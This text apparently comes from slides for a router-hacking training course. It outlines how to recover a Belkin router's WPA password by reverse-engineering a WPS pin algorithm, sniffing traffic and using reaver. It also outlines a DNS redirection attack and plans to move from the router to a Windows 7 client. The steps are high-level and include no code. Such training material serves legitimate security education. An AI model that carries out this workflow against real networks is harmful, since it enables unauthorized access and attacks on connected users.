Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Recap
Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 1
Recap
Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 2
Recap
Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 3
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
174
Recap
Pwned
Session I
Conclusion
In this session, we were able to obtain initial remote access to the target device
The next step is to elevate our privileges on the target to that of an adminsitrator.
This device uses client side authentication for admin privileges, which we will exploit in Session II
Session III will be focused on utilizing admin privileges from Session II to compromise a Windows 7 device connected to the Belkin router